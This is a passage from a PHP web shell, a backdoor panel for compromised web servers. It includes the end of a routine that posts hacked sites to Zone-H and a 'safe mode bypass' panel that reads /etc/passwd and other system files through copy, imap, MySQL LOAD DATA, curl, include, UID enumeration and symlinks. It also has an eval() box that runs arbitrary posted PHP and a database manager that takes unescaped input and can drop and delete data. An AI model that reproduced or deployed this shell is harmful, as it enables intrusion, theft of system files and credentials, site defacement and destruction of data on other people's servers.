2090. }
2091. ZoneH("http://zone-h.org/notify/single", $hacker, $method, $neden, $sites[$i]);
2092. echo "<font color=lime size=3>Site : ".$sites[$i]." Posted !</font><br>";
2093. ++$i;
2094. }
2095.  
2096. echo "<font color=lime size=4>Sending Sites To Zone-H Has Been Completed Successfully !! </font></pre>";
2097. }
2098.  
2099. // Spread Shell
2100. else if (isset($_GET["bypass"]))
2101. {
2102. if(isset($_GET['copy']))
2103. {
2104. if(@copy($_GET['copy'],"test1.php"))
2105. {
2106. $fh=fopen("test1.php",'r');
2107. echo "<textarea cols=120 rows=20 class=box readonly>".htmlspecialchars(@fread($fh,filesize("test1.php")))."</textarea></br></br>";
2108. @fclose($fh);
2109. unlink("test1.php");
2110. }
2111. }
2112. else if(isset($_GET['imap']))
2113. {
2114. $string = $_GET['imap'];
2115. echo "<textarea cols=120 rows=20 class=box readonly>";
2116. $stream = imap_open($string, "", "");
2117. $str = imap_body($stream, 1);
2118. echo "</textarea>";
2119. }
2120. else if(isset($_GET['sql']))
2121. {
2122. echo "<textarea cols=120 rows=20 class=box readonly>";
2123. $file=$_GET['ssql'];
2124.  
2125.  
2126. $mysql_files_str = "/etc/passwd:/proc/cpuinfo:/etc/resolv.conf:/etc/proftpd.conf";
2127. $mysql_files = explode(':', $mysql_files_str);
2128.  
2129. $sql = array (
2130. "USE $mdb",
2131. 'CREATE TEMPORARY TABLE ' . ($tbl = 'A'.time ()) . ' (a LONGBLOB)',
2132. "LOAD DATA LOCAL INFILE '$file' INTO TABLE $tbl FIELDS "
2133. . "TERMINATED BY '__THIS_NEVER_HAPPENS__' "
2134. . "ESCAPED BY '' "
2135. . "LINES TERMINATED BY '__THIS_NEVER_HAPPENS__'",
2136.  
2137. "SELECT a FROM $tbl LIMIT 1"
2138. );
2139. mysql_connect ($mhost, $muser, $mpass);
2140.  
2141. foreach ($sql as $statement) {
2142. $q = mysql_query ($statement);
2143.  
2144. if ($q == false) die (
2145. "FAILED: " . $statement . "\n" .
2146. "REASON: " . mysql_error () . "\n"
2147. );
2148.  
2149. if (! $r = @mysql_fetch_array ($q, MYSQL_NUM)) continue;
2150.  
2151. echo htmlspecialchars($r[0]);
2152. mysql_free_result ($q);
2153. }
2154. echo "</textarea>";
2155. }
2156. else if(isset($_GET['curl']))
2157. {
2158. $ch=curl_init("file://" . $_GET[curl]);
2159. curl_setopt($ch,CURLOPT_HEADERS,0);
2160. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
2161. $file_out=curl_exec($ch);
2162. curl_close($ch);
2163. echo "<textarea cols=120 rows=20 class=box readonly>".htmlspecialchars($file_out)."</textarea></br></br>";
2164. }
2165. else if(isset($_GET['include']))
2166. {
2167. if(file_exists($_GET['include']))
2168. {
2169. echo "<textarea cols=120 rows=20 class=box readonly>";
2170. @include($_GET['include']);
2171. echo "</textarea>";
2172. }
2173. else
2174. echo "<br><center><font color=red size=3>Can't Read" . $_GET['include'] . "</font></center>";
2175. }
2176. else if(isset($_GET['id']))
2177. {
2178. echo "<textarea cols=120 rows=20 class=box readonly>";
2179. for($uid=0;$uid<60000;$uid++)
2180. { //cat /etc/passwd
2181. $ara = posix_getpwuid($uid);
2182. if (!empty($ara))
2183. {
2184. while (list ($key, $val) = each($ara))
2185. {
2186. print "$val:";
2187. }
2188. print "\n";
2189. }
2190. }
2191. echo "</textarea>";
2192.  
2193. }
2194. else if(isset($_GET['tempname']))
2195. {
2196. tempnam("/home/" . $_GET['tempname']);
2197. }
2198. else if(isset($_GET['sym']))
2199. {
2200. echo "<textarea cols=120 rows=20 class=box readonly>";
2201. $fp = fopen("hack15.txt","w+");
2202. fwrite($fp,"Php Hacker Was Here");
2203. @unlink($flib);
2204. $sym = "/home/" . $them . "/public_html/" . $k;
2205. $link = "/home/" . $you . "/public_html/" . $folder . "/" . $flib;
2206. @symlink($sym, $link);
2207. if ($k{0} == "/")
2208. {
2209. echo "<script> window.location = '" . $flib . "'</script>";
2210. }
2211. else
2212. {
2213. echo "<pre><xmp>";
2214. echo readlink($flib) . "\n";
2215. echo "Filesize: " . linkinfo($flib) . "B\n\n";
2216. echo file_get_contents("http://" . $_SERVER['HTTP_HOST'] . "/" . $folder . "/" . $flib);
2217. echo "</textarea>";
2218. }
2219. }
2220. else
2221. {
2222. ?>
2223.  
2224. <table cellpadding="7" align="center" border="3" style="width:70%;">
2225. <tr>
2226. <td align="center" colspan="2"><font color="#FF0000" size="3">Safe mode bypass</font></td>
2227. </tr>
2228. <tr>
2229. <td align="center">
2230. <p>Using copy() function</p>
2231. <form action="<?php echo $self; ?>" method="get">
2232. <input type="hidden" name="bypass">
2233. <input type="text" name="copy" value="/etc/passwd" class="sbox"><input type="submit" value="bypass" class="but">
2234. </form>
2235. </td>
2236. <td align="center">
2237. <p>Using imap() function</p>
2238. <form action="<?php echo $self; ?>" method="get">
2239. <input type="hidden" name="bypass">
2240. <input type="text" name="imap" value="/etc/passwd" class="sbox"> <input type="submit" value="bypass" class="but">
2241. </form>
2242. </td>
2243. </tr>
2244.  
2245. <tr>
2246. <td align="center">
2247. <p>Using sql() function</p>
2248. <form action="<?php echo $self; ?>" method="get">
2249. <input type="hidden" name="bypass">
2250. <input type="text" name="sql" value="/etc/passwd" class="sbox"> <input type="submit" value="bypass" class="but">
2251. </form>
2252. </td>
2253. <td align="center">
2254. <p>Using Curl() function</p>
2255. <form action="<?php echo $self; ?>" method="get">
2256. <input type="hidden" name="bypass">
2257. <input type="text" name="curl" value="/etc/passwd" class="sbox"> <input type="submit" value="bypass" class="but">
2258. </form>
2259. </td>
2260. </tr>
2261.  
2262. <tr>
2263. <td align="center">
2264. <p>Bypass using include()</p>
2265. <form action="<?php echo $self; ?>" method="get">
2266. <input type="hidden" name="bypass">
2267. <input type="text" name="include" value="/etc/passwd" class="sbox"> <input type="submit" value="bypass" class="but">
2268. </form>
2269. </td>
2270. <td align="center">
2271. <p>Using id() function</p>
2272. <form action="<?php echo $self; ?>" method="get">
2273. <input type="hidden" name="bypass">
2274. <input type="text" name="id" value="/etc/passwd" class="sbox"> <input type="submit" value="bypass" class="but">
2275. </form>
2276. </td>
2277. </tr>
2278.  
2279. <tr>
2280. <td align="center">
2281. <p>Using tempnam() function</p>
2282. <form action="<?php echo $self; ?>" method="get">
2283. <input type="hidden" name="bypass">
2284. <input type="text" name="tempname" value="../../../etc/passwd" class="sbox"> <input type="submit" value="bypass" class="but">
2285. </form>
2286. </td>
2287. <td align="center">
2288. <p>Using symlink() function</p>
2289. <form action="<?php echo $self; ?>" method="get">
2290. <input type="hidden" name="bypass">
2291. <input type="text" name="sym" value="/etc/passwd" class="sbox"> <input type="submit" value="bypass" class="but">
2292. </form>
2293. </td>
2294. </tr>
2295. </table>
2296. </form>
2297. <?php
2298. }
2299. }
2300. else if (isset($_GET["phpc"]))
2301. {
2302. // If the comand was sent
2303. if(isset($_POST['code'])&& $_POST['code'] && isset($_POST['intext'])&& $_POST['intext'] == "disp")
2304. {
2305. // FIlter Some Chars we dont need
2306. ?><br>
2307. <textarea name="code" class="box" cols="120" rows="10"><?php
2308. $code = str_replace("<?php","",$_POST['code']);
2309. $code = str_replace("<?","",$code);
2310. $code = str_replace("?>","",$code);
2311.  
2312. // Evaluate PHP CoDE!
2313. htmlspecialchars(eval($code));
2314. ?>
2315. </textarea><?php
2316. }
2317. else if(isset($_POST['code'])&& $_POST['code'] && !isset($_POST['intext']))
2318. {
2319. $code = str_replace("<?php","",$_POST['code']);
2320. $code = str_replace("<?","",$code);
2321. $code = str_replace("?>","",$code);
2322.  
2323. // Evaluate PHP CoDE!
2324. ?><br><font color="red" size="4">Result of execution this PHP-code :</font><br><font color="lime" size="3"><?php htmlspecialchars(eval($code)); ?></font><?php
2325. }
2326. ?>
2327. <form method="POST">
2328. <textarea name="code" class="box" cols="120" rows="10"><?php if(isset($_POST['code'])) { echo $_POST['code']; } else { ?>phpinfo();<?php } ?></textarea>
2329. <br /><br />
2330. <input name="submit" value="Execute This COde! " class="but" type="submit" />
2331. <input type="checkbox" name="intext" value="disp"> <font color="lime" size="3">Display in Textarea</font>
2332. </form>
2333. <?php
2334. }
2335.  
2336.  
2337. else if(isset($_GET['database']))
2338. { ?>
2339. <form action=<?php echo $self; ?> method="POST">
2340. <table style="width:90%;" cellpadding="4" align="center">
2341. <tr>
2342. <td colspan="2">Connect To Database</td>
2343. </tr>
2344. <tr>
2345. <td>Server Address :</td>
2346. <td><input type="text" class="box" name="server" value="localhost"></td>
2347. <!--<td rowspan="4"><textarea name="query" cols="60" rows="7" class="box">SHOW DATABASE</textarea>-->
2348. </tr>
2349. <tr>
2350. <td>Username :</td>
2351. <td><input type="text" class="box" name="username" value="root"></td>
2352. </tr>
2353. <tr>
2354. <td>Password:</td>
2355. <td><input type="text" class="box" name="password" value=""></td>
2356. </tr>
2357.  
2358. <tr>
2359. <td></td>
2360. <td><input type="submit" value=" Connect " name="executeit" class="but"></td>
2361. </tr>
2362. </table>
2363. </form>
2364. <?php
2365. }
2366. // Execute Query
2367. else if(isset($_POST["executeit"]))
2368. {
2369. if(isset($_POST['username']) && isset($_POST['server']))
2370. { ?>
2371. <br>
2372. <form>
2373. <input type="hidden" name="action" value="createDB">
2374. <table>
2375. <tr>
2376. <td><input type="text" class="box" name="dbname"></td><td><input type="submit" value=" Create Database " name="createmydb" class="but"></td>
2377. </tr>
2378. </table>
2379. </form>
2380. <br>
2381. <?php
2382. $dbserver = $_POST['server'];
2383. $dbuser = $_POST['username'];
2384. $dbpass = $_POST['password'];
2385.  
2386. setcookie("dbserver", $dbserver);
2387. setcookie("dbuser", $dbuser);
2388. setcookie("dbpass", $dbpass);
2389. header("Location:$self?data");
2390.  
2391. }
2392. }
2393. else if(isset($_GET['data']))
2394. {
2395. listdatabase();
2396. }
2397. else if(isset($_GET['viewdb']))
2398. {
2399. listdatabase();
2400. }
2401.  
2402. else if(isset($_GET['action']) && isset($_GET['dbname']))
2403. {
2404. if($_GET['action'] == "createDB")
2405. {
2406. $dbname = $_GET['dbname'];
2407. $dbserver = $_COOKIE["dbserver"];
2408. $dbuser = $_COOKIE["dbuser"];
2409. $dbpass = $_COOKIE["dbpass"];
2410. $mysqlHandle = mysql_connect($dbserver, $dbuser, $dbpass);
2411. mysql_query("create database $dbname",$mysqlHandle);
2412. listdatabase();
2413. }
2414. if($_GET['action'] == 'dropDB')
2415. {
2416. $dbname = $_GET['dbname'];
2417. $dbserver = $_COOKIE["dbserver"];
2418. $dbuser = $_COOKIE["dbuser"];
2419. $dbpass = $_COOKIE["dbpass"];
2420. $mysqlHandle = mysql_connect($dbserver, $dbuser, $dbpass);
2421. mysql_query("drop database $dbname",$mysqlHandle);
2422. mysql_close($mysqlHandle);
2423. listdatabase();
2424. }
2425. if($_GET['action'] == 'listTables')
2426. {
2427. listtable();
2428. }
2429.  
2430. // Create Tables
2431. if($_GET['action'] == "createtable")
2432. {
2433. $dbserver = $_COOKIE["dbserver"];
2434. $dbuser = $_COOKIE["dbuser"];
2435. $dbpass = $_COOKIE["dbpass"];
2436. $dbname = $_GET['dbname'];
2437. $tablename = $_GET['tablename'];
2438. $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
2439. mysql_select_db($dbname);
2440. mysql_query("CREATE TABLE $tablename ( no INT )");
2441. listtable();
2442. }
2443.  
2444. // Drop Tables
2445. if($_GET['action'] == "dropTable")
2446. {
2447. $dbserver = $_COOKIE["dbserver"];
2448. $dbuser = $_COOKIE["dbuser"];
2449. $dbpass = $_COOKIE["dbpass"];
2450. $dbname = $_GET['dbname'];
2451. $tablename = $_GET['tablename'];
2452. $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
2453. mysql_select_db($dbname);
2454. mysql_query("drop table $tablename");
2455. listtable();
2456. }
2457.  
2458. // Empty Tables
2459. if($_GET['action'] == "empty")
2460. {
2461. $dbserver = $_COOKIE["dbserver"];
2462. $dbuser = $_COOKIE["dbuser"];
2463. $dbpass = $_COOKIE["dbpass"];
2464. $dbname = $_GET['dbname'];
2465. $tablename = $_GET['tablename'];
2466. $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
2467. mysql_select_db($dbname);
2468. mysql_query("delete from $tablename");
2469. listtable();
2470. }
2471.  
2472. // Empty Tables
2473. if($_GET['action'] == "dropField")
2474. {
2475. $dbserver = $_COOKIE["dbserver"];
2476. $dbuser = $_COOKIE["dbuser"];
2477. $dbpass = $_COOKIE["dbpass"];
2478. $dbname = $_GET['dbname'];
2479. $tablename = $_GET['tablename'];
2480. $fieldname = $_GET['fieldname'];
2481. $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
2482. mysql_select_db($dbname);
2483. $queryStr = "ALTER TABLE $tablename DROP COLUMN $fieldname";
2484. mysql_select_db( $dbname, $mysqlHandle );
2485. mysql_query( $queryStr , $mysqlHandle );
2486. listtable();
2487. }
2488.  
2489. // View Table Schema
2490. if($_GET['action'] == "viewSchema")
2491. {
2492. $dbserver = $_COOKIE["dbserver"];
2493. $dbuser = $_COOKIE["dbuser"];
2494. $dbpass = $_COOKIE["dbpass"];
2495. $dbname = $_GET['dbname'];
2496. $tablename = $_GET['tablename'];
2497. $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
2498. mysql_select_db($dbname);
2499. echo "<br><div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>&gt;</font> <a href=$self?viewdb&dbname=$dbname> <font size=3>Database List</font> </a> <font color=white size=3>&gt;</font> <a href=$self?action=listTables&dbname=$dbname&tablename=$tablename> <font size=3>Table List</font> </a> &nbsp; <a href=$self?logoutdb> <font color=red size=3>[ Log Out ]</font> </a></div>";
2500. $pResult = mysql_query( "SHOW fields FROM $tablename" );
2501. $num = mysql_num_rows( $pResult );
2502. echo "<br><br><table align=center cellspacing=4 style='width:80%;' border=1>";
2503. echo "<th>Field</th><th>Type</th><th>Null</th><th>Key</th></th>";
2504. for( $i = 0; $i < $num; $i++ )
2505. {
2506. $field = mysql_fetch_array( $pResult );
2507. echo "<tr>\n";
2508. echo "<td>".$field["Field"]."</td>\n";
2509. echo "<td>".$field["Type"]."</td>\n";
2510. echo "<td>".$field["Null"]."</td>\n";
2511. echo "<td>".$field["Key"]."</td>\n";
2512. echo "<td>".$field["Default"]."</td>\n";
2513. echo "<td>".$field["Extra"]."</td>\n";
2514. $fieldname = $field["Field"];
2515. echo "<td><a href='$self?action=dropField&dbname=$dbname&tablename=$tablename&fieldname=$fieldname' onClick=\"return confirm('Drop Field \'$fieldname\'?')\">Drop</a></td>\n";
2516. echo "</tr>\n";
2517. }
2518. echo "</table>";
2519. echo "<div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>&gt;</font> <a href=$self?viewdb&dbname=$dbname> <font size=3>Database List</font> </a> <font color=white size=3>&gt;</font> <a href=$self?action=listTables&dbname=$dbname&tablename=$tablename> <font size=3>Table List</font> </a> &nbsp; <a href=$self?logoutdb> <font color=red size=3>[ Log Out ]</font> </a></div>";
2520. }
2521.  
2522. // Execute Query
2523. if($_GET['action'] == "executequery")
2524. {
2525. $dbserver = $_COOKIE["dbserver"];
2526. $dbuser = $_COOKIE["dbuser"];
2527. $dbpass = $_COOKIE["dbpass"];
2528. $dbname = $_GET['dbname'];
2529. $tablename = $_GET['tablename'];
2530. $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
2531. mysql_select_db($dbname);
2532. $result = mysql_query($_GET['executemyquery']);
2533.  
2534. // results
2535. echo "<html>\r\n". strtoupper($_GET['executemyquery']) . "<br>\r\n<table border =\"1\">\r\n";
2536.  
2537. $count = 0;
2538. while ($row = mysql_fetch_assoc($result))
2539. {
2540. echo "<tr>\r\n";
2541.  
2542. if ($count==0) // list column names
2543. {
2544. echo "<tr>\r\n";
2545. while($key = key($row))
2546. {
2547. echo "<td><b>" . $key . "</b></td>\r\n";
2548. next($row);
2549. }
2550. echo "</tr>\r\n";
2551. }
2552.  
2553. foreach($row as $r) // list content of column names
2554. {
2555. if ($r=='') $r = '<font color=red>NULL</font>';
2556. echo "<td><font color=lime>" . $r . "</font></td>\r\n";
2557. }
2558. echo "</tr>\r\n";
2559. $count++;
2560. }
2561. echo "</table>\n\r<font color=lime size=3>" . $count . " rows returned.</font>\r\n</html>";
2562. echo "<div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>&gt;</font> <a href=$self?viewdb&dbname=$dbname> <font size=3>Database List</font> </a> <font color=white size=3>&gt;</font> <a href=$self?action=listTables&dbname=$dbname&tablename=$tablename> <font size=3>Table List</font> </a> &nbsp; <a href=$self?logoutdb> <font color=red size=3>[ Log Out ]</font> </a></div>";
2563. }
2564.  
2565. // View Table Data
2566. if($_GET['action'] == "viewdata")
2567. {
2568. global $queryStr, $action, $mysqlHandle, $dbname, $tablename, $PHP_SELF, $errMsg, $page, $rowperpage, $orderby, $data;
2569. $dbserver = $_COOKIE["dbserver"];
2570. $dbuser = $_COOKIE["dbuser"];
2571. $dbpass = $_COOKIE["dbpass"];
2572. $dbname = $_GET['dbname'];
2573. $tablename = $_GET['tablename'];
2574. echo "<br><div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>&gt;</font> <a href=$self?viewdb&dbname=$dbname> <font size=3>Database List</font> </a> <font color=white size=3>&gt;</font> <a href=$self?action=listTables&dbname=$dbname&tablename=$tablename> <font size=3>Table List</font> </a> &nbsp; <a href=$self?logoutdb> <font color=red size=3>[ Log Out ]</font> </a></div>";
2575. ?>
2576. <br><br>
2577. <form>
2578. <input type="hidden" value="<?php echo $_GET['dbname']; ?>" name="dbname">
2579. <input type="hidden" value="<?php echo $_GET['tablename']; ?>" name="tablename">
2580. <input type="hidden" value="executequery" name="action">
2581. <table>
2582. <tr>
2583. <td><textarea cols="60" rows="7" name="executemyquery" class="box">Execute Query..</textarea></td>
2584. </tr>
2585. <tr>
2586. <td><input type="submit" value="Execute" class="but"></td>
2587. </tr>
2588. </table>
2589. </form>
2590. <?php
2591. $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
2592. mysql_select_db($dbname);
2593.  
2594. $sql = mysql_query("SELECT `COLUMN_NAME` FROM `information_schema`.`COLUMNS` WHERE (`TABLE_SCHEMA` = '$dbname') AND (`TABLE_NAME` = '$tablename') AND (`COLUMN_KEY` = 'PRI');");
2595. $row = mysql_fetch_array($sql);
2596. $rowid = $row['COLUMN_NAME'];
2597.  
2598. echo "<br><font size=4 color =lime>Data in Table</font><br>";
2599. if( $tablename != "" )
2600. echo "<font size=3 color=lime>$dbname &gt; $tablename</font><br>";
2601. else
2602. echo "<font size=3 color=lime>$dbname</font><br>";
2603.  
2604. $queryStr = "";
2605. $pag = 0;
2606. $queryStr = stripslashes( $queryStr );
2607. if( $queryStr == "" )
2608. {
2609. if(isset($_REQUEST['page']))
2610. {
2611. $res = mysql_query("select * from $tablename");
2612. $getres = mysql_num_rows($res);
2613. $coun = ceil($getres/30);
2614. if($_REQUEST['page'] != 1)
2615. $pag = $_REQUEST['page'] * 30;
2616. else
2617. $pag = $_REQUEST['page'] * 30;
2618.  
2619. $queryStr = "SELECT * FROM $tablename LIMIT $pag,30";
2620. $sql = mysql_query("SELECT $rowid FROM $tablename ORDER BY $rowid LIMIT $pag,30");
2621. $arrcount = 1;
2622. $arrdata[$arrcount] = 0;
2623. while($row = mysql_fetch_array($sql))
2624. {
2625. $arrdata[$arrcount] = $row[$rowid];
2626. $arrcount++;
2627. }
2628. }
2629. else
2630. {
2631. $queryStr = "SELECT * FROM $tablename LIMIT 0,30";
2632. $sql = mysql_query("SELECT $rowid FROM $tablename ORDER BY $rowid LIMIT 0,30");
2633. $arrcount = 1;
2634. $arrdata[$arrcount] = 0;
2635. while($row = mysql_fetch_array($sql))
2636. {
2637. $arrdata[$arrcount] = $row[$rowid];
2638. $arrcount++;
2639. }
2640. }
2641. if( $orderby != "" )
2642. $queryStr .= " ORDER BY $orderby";
2643. echo "<a href='$PHP_SELF?action=viewSchema&dbname=$dbname&tablename=$tablename'><font size=3>Schema</font></a>\n";
2644. }
2645.  
2646. $pResult = mysql_query($queryStr );
2647. $fieldt = mysql_fetch_field($pResult);
2648. $tablename = $fieldt->table;
2649. $errMsg = mysql_error();
2650.  
2651. $GLOBALS[queryStr] = $queryStr;
2652.  
2653. if( $pResult == false )
2654. {
2655. echoQueryResult();
2656. return;
2657. }
2658. if( $pResult == 1 )
2659. {
2660. $errMsg = "Success";
2661. echoQueryResult();
2662. return;
2663. }
2664.  
2665. echo "<hr>\n";
2666.  
2667. $row = mysql_num_rows( $pResult );
2668. $col = mysql_num_fields( $pResult );
2669.  
2670. if( $row == 0 )
2671. {
2672. echo "<font color=red size=3>No Data Exist!</font>";
2673. return;
2674. }
2675.  
2676. if( $rowperpage == "" ) $rowperpage = 30;
2677. if( $page == "" ) $page = 0;
2678. else $page--;
2679. mysql_data_seek( $pResult, $page * $rowperpage );
2680.  
2681. echo "<table cellspacing=1 cellpadding=5 border=1 align=center>\n";
2682. echo "<tr>\n";
2683. for( $i = 0; $i < $col; $i++ )
2684. {
2685. $field = mysql_fetch_field( $pResult, $i );
2686. echo "<th>";
2687. if($action == "viewdata")
2688. echo "<a href='$PHP_SELF?action=viewdata&dbname=$dbname&tablename=$tablename&orderby=".$field->name."'>".$field->name."</a>\n";
2689. else
2690. echo $field->name."\n";
2691. echo "</th>\n";
2692. }
2693. echo "<th colspan=2>Action</th>\n";
2694. echo "</tr>\n";
2695. $num=1;
2696.  
2697.  
2698. $acount = 1;
2699.  
2700. for( $i = 0; $i < $rowperpage; $i++ )
2701. {
2702. $rowArray = mysql_fetch_row( $pResult );
2703. if( $rowArray == false ) break;
2704. echo "<tr>\n";
2705. $key = "";
2706. for( $j = 0; $j < $col; $j++ )
2707. {
2708. $data = $rowArray[$j];
2709.  
2710. $field = mysql_fetch_field( $pResult, $j );
2711. if( $field->primary_key == 1 )
2712. $key .= "&" . $field->name . "=" . $data;
2713.  
2714. if( strlen( $data ) > 30 )
2715. $data = substr( $data, 0, 30 ) . "...";
2716. $data = htmlspecialchars( $data );
2717. echo "<td>\n";
2718. echo "<font color=lime>$data</font>\n";
2719. echo "</td>\n";
2720. }
2721.  
2722. if(!is_numeric($arrdata[$acount]))
2723. echo "<td colspan=2>No Key</td>\n";
2724. else
2725. {
2726. echo "<td><a href='$PHP_SELF?action=editData&$rowid=$arrdata[$acount]&dbname=$dbname&tablename=$tablename'>Edit</a></td>\n";
2727. echo "<td><a href='$PHP_SELF?action=deleteData&$rowid=$arrdata[$acount]&dbname=$dbname&tablename=$tablename' onClick=\"return confirm('Delete Row?')\">Delete</a></td>\n";
2728. $acount++;
2729. }
2730. }
2731. echo "</tr>\n";
2732.  
2733.  
2734. echo "</table>";
2735. if($arrcount > 30)
2736. {
2737. $res = mysql_query("select * from $tablename");
2738. $getres = mysql_num_rows($res);
2739. $coun = ceil($getres/30);
2740. echo "<form action=$self><input type=hidden value=viewdata name=action><input type=hidden name=tablename value=$tablename><input type=hidden value=$dbname name=dbname><select style='width: 95px;' name=page class=sbox>";
2741. for($i=0;$i<$coun;$i++)
2742. echo "<option value=$i>$i</option>";
2743.  
2744. echo "</select> <input type=submit value=Go class=but></form>";
2745. echo "<br><div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>&gt;</font> <a href=$self?viewdb&dbname=$dbname> <font size=3>Database List</font> </a> <font color=white size=3>&gt;</font> <a href=$self?action=listTables&dbname=$dbname&tablename=$tablename> <font size=3>Table List</font> </a> &nbsp; <a href=$self?logoutdb> <font color=red size=3>[ Log Out ]</font> </a></div>";
2746. }
2747. }
2748.  
2749. // Delete Table Data
2750. if($_GET['action'] == "deleteData")
2751. {
2752. $dbserver = $_COOKIE["dbserver"];
2753. $dbuser = $_COOKIE["dbuser"];
2754. $dbpass = $_COOKIE["dbpass"];
2755. $dbname = $_GET['dbname'];
2756. $tablename = $_GET['tablename'];
2757. $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
2758. mysql_select_db($dbname);
2759. $sql = mysql_query("SELECT `COLUMN_NAME` FROM `information_schema`.`COLUMNS` WHERE (`TABLE_SCHEMA` = '$dbname') AND (`TABLE_NAME` = '$tablename') AND (`COLUMN_KEY` = 'PRI');");
2760. $row = mysql_fetch_array($sql);
2761. $row = $row['COLUMN_NAME'];
2762. $rowid = $_GET[$row];
2763. mysql_query("delete from $tablename where $row = '$rowid'");
2764. header("Location:$self?action=viewdata&dbname=$dbname&tablename=$tablename");
2765. }
2766. // Edit Table Data
2767. if($_GET['action'] == "editData")
2768. {
2769. global $queryStr, $action, $mysqlHandle, $dbname, $tablename, $PHP_SELF, $errMsg, $page, $rowperpage, $orderby, $data;
2770. $dbserver = $_COOKIE["dbserver"];
2771. $dbuser = $_COOKIE["dbuser"];
2772. $dbpass = $_COOKIE["dbpass"];
2773. $dbname = $_GET['dbname'];
2774. $tablename = $_GET['tablename'];
2775. echo "<br><div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>&gt;</font> <a href=$self?viewdb&dbname=$dbname> <font size=3>Database List</font> </a> <font color=white size=3>&gt;</font> <a href=$self?action=listTables&dbname=$dbname&tablename=$tablename> <font size=3>Table List</font> </a> &nbsp; <a href=$self?logoutdb> <font color=red size=3>[ Log Out ]</font> </a></div>";
2776. ?>
2777. <br><br>
2778. <form action="<?php echo $self; ?>" method="post">
2779. <input type="hidden" name="tablename" value="<?php echo $tablename; ?>">
2780. <input type="hidden" name="action" value="editsubmitData">
2781. <?php
2782. $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
2783. mysql_select_db($dbname);
2784.  
2785. $sql = mysql_query("SELECT `COLUMN_NAME` FROM `information_schema`.`COLUMNS` WHERE (`TABLE_SCHEMA` = '$dbname') AND (`TABLE_NAME` = '$tablename') AND (`COLUMN_KEY` = 'PRI');");
2786. $row = mysql_fetch_array($sql);
2787. $row = $row['COLUMN_NAME'];
2788. $rowid = $_GET[$row];
2789.  
2790. $pResult = mysql_list_fields( $dbname, $tablename );
2791. $num = mysql_num_fields( $pResult );
2792.  
2793. $key = "";
2794. for( $i = 0; $i < $num; $i++ )
2795. {
2796. $field = mysql_fetch_field( $pResult, $i );
2797. if( $field->primary_key == 1 )
2798. if( $field->numeric == 1 )
2799. $key .= $field->name . "=" . $GLOBALS[$field->name] . " AND ";
2800. else
2801. $key .= $field->name . "='" . $GLOBALS[$field->name] . "' AND ";
2802. }
2803. $key = substr( $key, 0, strlen($key)-4 );
2804.  
2805. mysql_select_db( $dbname, $mysqlHandle );
2806. $pResult = mysql_query( $queryStr = "SELECT * FROM $tablename WHERE $row = $rowid", $mysqlHandle );
2807. $data = mysql_fetch_array( $pResult );
2808.  
2809.  
2810. echo "<input type=hidden name=dbname value=$dbname>\n";
2811. echo "<input type=hidden name=tablename value=$tablename>\n";
2812. echo "<input type=hidden name=$row value=$rowid>";
2813. echo "<table cellspacing=1 cellpadding=2 border=1>\n";
2814. echo "<tr>\n";
2815. echo "<th>Name</th>\n";
2816. echo "<th>Type</th>\n";
2817. echo "<th>Function</th>\n";
2818. echo "<th>Data</th>\n";
2819. echo "</tr>\n";
2820.  
2821. $pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
2822. $num = mysql_num_rows( $pResult );
2823.  
2824. $pResultLen = mysql_list_fields( $dbname, $tablename );
2825.  
2826. for( $i = 0; $i < $num; $i++ )
2827. {
2828. $field = mysql_fetch_array( $pResult );
2829. $fieldname = $field["Field"];
2830. $fieldtype = $field["Type"];
2831. $len = mysql_field_len( $pResultLen, $i );
2832.  
2833. echo "<tr>";
2834. echo "<td>$fieldname</td>";
2835. echo "<td>".$field["Type"]."</td>";
2836. echo "<td>\n";
2837. echo "<select name=${fieldname}_function class=sbox>\n";
2838. echo "<option>\n";
2839. echo "<option>ASCII\n";
2840. echo "<option>CHAR\n";
2841. echo "<option>SOUNDEX\n";
2842. echo "<option>CURDATE\n";
2843. echo "<option>CURTIME\n";
2844. echo "<option>FROM_DAYS\n";
2845. echo "<option>FROM_UNIXTIME\n";
2846. echo "<option>NOW\n";
2847. echo "<option>PASSWORD\n";
2848. echo "<option>PERIOD_ADD\n";
2849. echo "<option>PERIOD_DIFF\n";
2850. echo "<option>TO_DAYS\n";
2851. echo "<option>USER\n";
2852. echo "<option>WEEKDAY\n";
2853. echo "<option>RAND\n";
2854. echo "</select>\n";
2855. echo "</td>\n";
2856. $value = htmlspecialchars($data[$i]);
2857. $type = strtok( $fieldtype, " (,)\n" );
2858. if( $type == "enum" || $type == "set" )
2859. {
2860. echo "<td>\n";
2861. if( $type == "enum" )
2862. echo "<select name=$fieldname class=box>\n";
2863. else if( $type == "set" )
2864. echo "<select name=$fieldname size=4 class=box multiple>\n";
2865. while( $str = strtok( "'" ) )
2866. {
2867. if( $value == $str )
2868. echo "<option selected>$str\n";
2869. else
2870. echo "<option>$str\n";
2871. strtok( "'" );
2872. }
2873. echo "</select>\n";
2874. echo "</td>\n";
2875. }
2876. else
2877. {
2878. if( $len < 40 )
2879. echo "<td><input type=text size=40 maxlength=$len name=$fieldname value=\"$value\" class=box></td>\n";
2880. else
2881. echo "<td><textarea cols=47 rows=3 maxlength=$len name=$fieldname class=box>$value</textarea>\n";
2882. }
2883. echo "</tr>";
2884. }
2885. echo "</table><p>\n";
2886. echo "<input type=submit value='Edit Data' class=but>\n";
2887. echo "<input type=button value='Cancel' onClick='history.back()' class=but>\n";
2888. echo "</form>\n";
2889. }
2890. }
2891.  
2892. // Edit Submit Table Data
2893. else if($_REQUEST['action'] == "editsubmitData")
2894. {
2895. $dbserver = $_COOKIE["dbserver"];
2896. $dbuser = $_COOKIE["dbuser"];
